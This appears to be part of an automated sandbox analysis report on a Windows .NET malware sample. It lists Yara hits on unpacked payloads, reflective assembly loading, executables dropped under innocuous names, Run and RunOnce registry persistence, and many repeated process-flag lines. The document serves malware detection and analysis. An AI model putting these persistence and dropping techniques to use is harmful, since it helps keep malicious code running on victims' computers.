Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: BPL_1000572_007.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BPL_1000572_007.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

Data Obfuscation

barindex
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pdf.exe PID: 3712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pdf.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fireless.exe PID: 1420, type: MEMORYSTR
Source: BPL_1000572_007.bat.exe, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Wthdlxoyqvnqsfcfiinf.exe.0.dr, yjyog.cs .Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: pdf.exe.0.dr, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.BPL_1000572_007.bat.exe.5b0000.0.unpack, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.Wthdlxoyqvnqsfcfiinf.exe.6d0000.0.unpack, yjyog.cs .Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: fireless.exe.13.dr, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02752318 pushfd ; iretd 0_2_027527D5
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02752020 push esp; iretd 0_2_0275230D
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02752304 push esp; iretd 0_2_0275230D
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_027527BA pushfd ; iretd 0_2_027527D5
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_0301EEC1 push FFFFFF8Bh; iretd 17_2_0301EEC3
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Roaming\note\pdf.exe Jump to dropped file
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Jump to dropped file
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdf Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdf Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdf Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
